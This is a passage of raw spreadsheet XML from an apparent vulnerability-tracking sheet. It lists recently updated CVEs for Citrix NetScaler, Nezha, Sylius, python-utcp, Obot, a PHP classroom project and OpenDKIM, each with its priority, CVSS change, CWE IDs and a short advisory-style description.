      <c r="H247" s="5" t="inlineStr"/>
      <c r="I247" s="5" t="inlineStr"/>
      <c r="J247" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K247" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="L247" s="5" t="inlineStr"/>
      <c r="M247" s="5" t="inlineStr"/>
      <c r="N247" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O247" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P247" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q247" s="5" t="inlineStr"/>
      <c r="R247" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="S247" s="5" t="inlineStr">
        <is>
          <t>Memory overflow vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway.
This issue affects ADC: before 14.1-73.37, before 13.1-64.23, before 14.1-73.37 FIPS, and before 13.1.37.279 FIPS and NDcPP; Gateway: before 14.1-73.37 and before 13.1-64.23 leading Memory overflow vulnerability leading to unpredictable or erroneous behavior or Denial of Service</t>
        </is>
      </c>
      <c r="T247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88775</t>
        </is>
      </c>
    </row>
    <row r="248">
      <c r="A248" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B248" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.8 → 9.8)</t>
        </is>
      </c>
      <c r="C248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88776</t>
        </is>
      </c>
      <c r="D248" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E248" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F248" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G248" s="5" t="inlineStr"/>
      <c r="H248" s="5" t="inlineStr"/>
      <c r="I248" s="5" t="inlineStr"/>
      <c r="J248" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K248" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="L248" s="5" t="inlineStr"/>
      <c r="M248" s="5" t="inlineStr"/>
      <c r="N248" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O248" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P248" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q248" s="5" t="inlineStr"/>
      <c r="R248" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="S248" s="5" t="inlineStr">
        <is>
          <t>Memory overflow vulnerability vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway.
This issue affects ADC: before 14.1-73.37, before 13.1-64.23, before 14.1-73.37 FIPS, and before 13.1.37.279 FIPS and NDcPP; Gateway: before 14.1-73.37 and before 13.1-64.23  leading to unpredictable or erroneous behavior or Denial of Service</t>
        </is>
      </c>
      <c r="T248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88776</t>
        </is>
      </c>
    </row>
    <row r="249">
      <c r="A249" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B249" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.8 → 9.8)</t>
        </is>
      </c>
      <c r="C249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88777</t>
        </is>
      </c>
      <c r="D249" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E249" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F249" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G249" s="5" t="inlineStr"/>
      <c r="H249" s="5" t="inlineStr"/>
      <c r="I249" s="5" t="inlineStr"/>
      <c r="J249" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K249" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="L249" s="5" t="inlineStr"/>
      <c r="M249" s="5" t="inlineStr"/>
      <c r="N249" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O249" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P249" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q249" s="5" t="inlineStr"/>
      <c r="R249" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="S249" s="5" t="inlineStr">
        <is>
          <t>Memory overflow vulnerability vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway.
This issue affects ADC: before 14.1-73.37, before 13.1-64.23, before 14.1-73.37 FIPS, and before 13.1.37.279 FIPS and NDcPP; Gateway: before 14.1-73.37 and before 13.1-64.23  leading to unpredictable or erroneous behavior or Denial of Service</t>
        </is>
      </c>
      <c r="T249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88777</t>
        </is>
      </c>
    </row>
    <row r="250">
      <c r="A250" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B250" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.8 → 9.3)</t>
        </is>
      </c>
      <c r="C250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101090</t>
        </is>
      </c>
      <c r="D250" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E250" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F250" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G250" s="5" t="inlineStr"/>
      <c r="H250" s="5" t="inlineStr"/>
      <c r="I250" s="5" t="inlineStr"/>
      <c r="J250" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K250" s="5" t="inlineStr"/>
      <c r="L250" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/nezhahq/nezha</t>
        </is>
      </c>
      <c r="M250" s="5" t="inlineStr"/>
      <c r="N250" s="5" t="inlineStr">
        <is>
          <t>NVD, OSV</t>
        </is>
      </c>
      <c r="O250" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P250" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q250" s="5" t="inlineStr"/>
      <c r="R250" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="S250" s="5" t="inlineStr">
        <is>
          <t>Nezha 2.2.3 contains a Host header injection regression in the OAuth2 redirect endpoint. When the new optional dashboard_host setting is empty, /api/v1/oauth2/{provider} (cmd/dashboard/controller/oauth2.go) reflects the attacker-supplied HTTP Host header into the redirect_uri sent to the identity provider instead of falling back to the configured install_host. An attacker who induces a victim to begin OAuth2 login via a request that reaches Nezha with a forged Host header can cause an attacker-controlled callback URL to be used as the redirect_uri; if the OAuth2 provider accepts it, the victim's authorization code is delivered to the attacker origin, allowing the attacker to complete the OAuth2 login/binding flow and take over the account. This regresses the fix for GHSA-9rc6-8cjv-rcvx and is configuration-dependent (dashboard_host empty). At the time of the advisory no patched version was available.</t>
        </is>
      </c>
      <c r="T250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101090</t>
        </is>
      </c>
    </row>
    <row r="251">
      <c r="A251" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B251" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.5 → 8.7)</t>
        </is>
      </c>
      <c r="C251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100872</t>
        </is>
      </c>
      <c r="D251" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E251" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F251" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G251" s="5" t="inlineStr"/>
      <c r="H251" s="5" t="inlineStr"/>
      <c r="I251" s="5" t="inlineStr"/>
      <c r="J251" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K251" s="5" t="inlineStr"/>
      <c r="L251" s="5" t="inlineStr"/>
      <c r="M251" s="5" t="inlineStr"/>
      <c r="N251" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O251" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P251" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q251" s="5" t="inlineStr"/>
      <c r="R251" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="S251" s="5" t="inlineStr">
        <is>
          <t>Sylius versions before 2.1.16 and 2.2.9 fail to validate payment amounts during cart recalculation, allowing unauthenticated attackers to modify order totals after gateway transaction initiation. Attackers can pay a small amount, enlarge the order after gateway capture, and have the system mark the inflated order as fully paid while the gateway captured only the original amount.</t>
        </is>
      </c>
      <c r="T251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100872</t>
        </is>
      </c>
    </row>
    <row r="252">
      <c r="A252" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B252" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.2 → 8.4)</t>
        </is>
      </c>
      <c r="C252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101060</t>
        </is>
      </c>
      <c r="D252" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E252" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F252" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G252" s="5" t="inlineStr"/>
      <c r="H252" s="5" t="inlineStr"/>
      <c r="I252" s="5" t="inlineStr"/>
      <c r="J252" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K252" s="5" t="inlineStr"/>
      <c r="L252" s="5" t="inlineStr"/>
      <c r="M252" s="5" t="inlineStr"/>
      <c r="N252" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O252" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P252" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q252" s="5" t="inlineStr"/>
      <c r="R252" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S252" s="5" t="inlineStr">
        <is>
          <t>python-utcp versions before 1.1.4 contain a server-side request forgery vulnerability in HttpCommunicationProtocol.call_tool that validates the initial tool URL but follows HTTP redirects without re-validating the target. Attackers controlling a tool endpoint can return a 302 redirect to internal services, allowing the UTCP client to reach cloud metadata endpoints or internal HTTP services and return their response bodies to the caller.</t>
        </is>
      </c>
      <c r="T252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101060</t>
        </is>
      </c>
    </row>
    <row r="253">
      <c r="A253" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B253" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.6 → 8.3)</t>
        </is>
      </c>
      <c r="C253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101064</t>
        </is>
      </c>
      <c r="D253" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E253" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F253" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G253" s="5" t="inlineStr"/>
      <c r="H253" s="5" t="inlineStr"/>
      <c r="I253" s="5" t="inlineStr"/>
      <c r="J253" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K253" s="5" t="inlineStr"/>
      <c r="L253" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/obot-platform/obot</t>
        </is>
      </c>
      <c r="M253" s="5" t="inlineStr">
        <is>
          <t>0.23.0</t>
        </is>
      </c>
      <c r="N253" s="5" t="inlineStr">
        <is>
          <t>NVD, OSV</t>
        </is>
      </c>
      <c r="O253" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P253" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q253" s="5" t="inlineStr"/>
      <c r="R253" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S253" s="5" t="inlineStr">
        <is>
          <t>Obot before v0.23.0 contains a server-side request forgery vulnerability in remote MCP server registration that allows privileged users to specify arbitrary URLs without destination validation. Attackers with Power User or higher roles can coerce Obot to make requests to internal services and cloud metadata endpoints, reading responses in error messages to disclose sensitive credentials.</t>
        </is>
      </c>
      <c r="T253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101064</t>
        </is>
      </c>
    </row>
    <row r="254">
      <c r="A254" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B254" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.8 → 7.5)</t>
        </is>
      </c>
      <c r="C254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88778</t>
        </is>
      </c>
      <c r="D254" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E254" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F254" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G254" s="5" t="inlineStr"/>
      <c r="H254" s="5" t="inlineStr"/>
      <c r="I254" s="5" t="inlineStr"/>
      <c r="J254" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K254" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="L254" s="5" t="inlineStr"/>
      <c r="M254" s="5" t="inlineStr"/>
      <c r="N254" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O254" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P254" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q254" s="5" t="inlineStr"/>
      <c r="R254" s="5" t="inlineStr">
        <is>
          <t>CWE-342</t>
        </is>
      </c>
      <c r="S254" s="5" t="inlineStr">
        <is>
          <t>Predictable exact value from previous values vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway.
This issue affects ADC: before 14.1-73.37, before 13.1-64.23, before 14.1-73.37 FIPS, and before 13.1.37.279 FIPS and NDcPP; Gateway: before 14.1-73.37 and before 13.1-64.23.</t>
        </is>
      </c>
      <c r="T254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88778</t>
        </is>
      </c>
    </row>
    <row r="255">
      <c r="A255" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B255" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.0 → 7.2)</t>
        </is>
      </c>
      <c r="C255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88774</t>
        </is>
      </c>
      <c r="D255" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E255" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F255" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G255" s="5" t="inlineStr"/>
      <c r="H255" s="5" t="inlineStr"/>
      <c r="I255" s="5" t="inlineStr"/>
      <c r="J255" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K255" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="L255" s="5" t="inlineStr"/>
      <c r="M255" s="5" t="inlineStr"/>
      <c r="N255" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O255" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P255" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q255" s="5" t="inlineStr"/>
      <c r="R255" s="5" t="inlineStr"/>
      <c r="S255" s="5" t="inlineStr">
        <is>
          <t>Vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway.
This issue affects ADC: before 14.1-73.37, before 13.1-64.23, before 14.1-73.37 FIPS, and before 13.1.37.279 FIPS and NDcPP; Gateway: before 14.1-73.37 and before 13.1-64.23 leading to a feature policy bypass due to improper HTTP URL based expression usage.</t>
        </is>
      </c>
      <c r="T255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88774</t>
        </is>
      </c>
    </row>
    <row r="256">
      <c r="A256" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B256" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.5 → 7.1)</t>
        </is>
      </c>
      <c r="C256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101085</t>
        </is>
      </c>
      <c r="D256" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E256" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F256" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G256" s="5" t="inlineStr"/>
      <c r="H256" s="5" t="inlineStr"/>
      <c r="I256" s="5" t="inlineStr"/>
      <c r="J256" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K256" s="5" t="inlineStr"/>
      <c r="L256" s="5" t="inlineStr"/>
      <c r="M256" s="5" t="inlineStr"/>
      <c r="N256" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O256" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P256" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q256" s="5" t="inlineStr"/>
      <c r="R256" s="5" t="inlineStr">
        <is>
          <t>CWE-197</t>
        </is>
      </c>
      <c r="S256" s="5" t="inlineStr">
        <is>
          <t>Nezha before 2.3.8 fails to validate alert rule type and duration bounds, allowing authenticated non-administrator users to create malformed rules that trigger unrecovered panics in the alert evaluator goroutine. Attackers can submit a crafted alert rule via the POST /api/v1/alert-rule endpoint to crash the dashboard process, which persists the rule and causes repeated crashes on restart, disabling all monitoring and control plane functionality.</t>
        </is>
      </c>
      <c r="T256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101085</t>
        </is>
      </c>
    </row>
    <row r="257">
      <c r="A257" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B257" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.3 → 6.9)</t>
        </is>
      </c>
      <c r="C257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101063</t>
        </is>
      </c>
      <c r="D257" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E257" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F257" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G257" s="5" t="inlineStr"/>
      <c r="H257" s="5" t="inlineStr"/>
      <c r="I257" s="5" t="inlineStr"/>
      <c r="J257" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K257" s="5" t="inlineStr"/>
      <c r="L257" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/obot-platform/obot</t>
        </is>
      </c>
      <c r="M257" s="5" t="inlineStr">
        <is>
          <t>0.23.0</t>
        </is>
      </c>
      <c r="N257" s="5" t="inlineStr">
        <is>
          <t>NVD, OSV</t>
        </is>
      </c>
      <c r="O257" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P257" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q257" s="5" t="inlineStr"/>
      <c r="R257" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S257" s="5" t="inlineStr">
        <is>
          <t>Obot versions before v0.23.0 fail to enforce authentication on MCP Registry endpoints under /v0.1/* when registry authentication is enabled. Unauthenticated attackers can read registry metadata including server names, descriptions, repository URLs, and connect URLs by sending GET requests to /v0.1/servers.</t>
        </is>
      </c>
      <c r="T257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101063</t>
        </is>
      </c>
    </row>
    <row r="258">
      <c r="A258" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B258" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.3 → 5.5)</t>
        </is>
      </c>
      <c r="C258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100874</t>
        </is>
      </c>
      <c r="D258" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E258" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F258" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G258" s="5" t="inlineStr"/>
      <c r="H258" s="5" t="inlineStr"/>
      <c r="I258" s="5" t="inlineStr"/>
      <c r="J258" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K258" s="5" t="inlineStr"/>
      <c r="L258" s="5" t="inlineStr"/>
      <c r="M258" s="5" t="inlineStr"/>
      <c r="N258" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O258" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P258" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q258" s="5" t="inlineStr"/>
      <c r="R258" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S258" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in mathurvishal CloudClassroom-PHP-Project up to 5dadec098bfbbf3300d60c3494db3fb95b66e7be. This affects an unknown function of the file addnewstudent.php. This manipulation causes sql injection. The attack may be initiated remotely. The exploit has been published and may be used. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100874</t>
        </is>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B259" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.3 → 5.5)</t>
        </is>
      </c>
      <c r="C259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100875</t>
        </is>
      </c>
      <c r="D259" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E259" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F259" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G259" s="5" t="inlineStr"/>
      <c r="H259" s="5" t="inlineStr"/>
      <c r="I259" s="5" t="inlineStr"/>
      <c r="J259" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K259" s="5" t="inlineStr"/>
      <c r="L259" s="5" t="inlineStr"/>
      <c r="M259" s="5" t="inlineStr"/>
      <c r="N259" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O259" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P259" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q259" s="5" t="inlineStr"/>
      <c r="R259" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S259" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in mathurvishal CloudClassroom-PHP-Project up to 5dadec098bfbbf3300d60c3494db3fb95b66e7be. This impacts an unknown function of the file updatedetailsfromfaculty.php. Such manipulation of the argument myfid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100875</t>
        </is>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B260" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.3 → 5.5)</t>
        </is>
      </c>
      <c r="C260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100889</t>
        </is>
      </c>
      <c r="D260" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E260" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F260" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G260" s="5" t="inlineStr"/>
      <c r="H260" s="5" t="inlineStr"/>
      <c r="I260" s="5" t="inlineStr"/>
      <c r="J260" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K260" s="5" t="inlineStr"/>
      <c r="L260" s="5" t="inlineStr"/>
      <c r="M260" s="5" t="inlineStr"/>
      <c r="N260" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O260" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P260" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q260" s="5" t="inlineStr"/>
      <c r="R260" s="5" t="inlineStr">
        <is>
          <t>CWE-189, CWE-193</t>
        </is>
      </c>
      <c r="S260" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in Trusted Domain Project OpenDKIM up to 2.11.0. Affected is the function dkim_qp_decode of the file util.c of the component Decoder. The manipulation results in off-by-one. The attack may be performed from remote. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100889</t>
        </is>
      </c>
    </row>
    <row r="261">
      <c r="A261" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B261" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.3 → 5.5)</t>
        </is>
      </c>
      <c r="C261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100890</t>
        </is>
      </c>
      <c r="D261" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E261" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F261" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G261" s="5" t="inlineStr"/>
      <c r="H261" s="5" t="inlineStr"/>
      <c r="I261" s="5" t="inlineStr"/>
      <c r="J261" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K261" s="5" t="inlineStr"/>
      <c r="L261" s="5" t="inlineStr"/>
      <c r="M261" s="5" t="inlineStr"/>
      <c r="N261" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O261" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P261" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q261" s="5" t="inlineStr"/>
      <c r="R261" s="5" t="inlineStr">
        <is>
          <t>CWE-404, CWE-476</t>
        </is>
      </c>
      <c r="S261" s="5" t="inlineStr">
        <is>
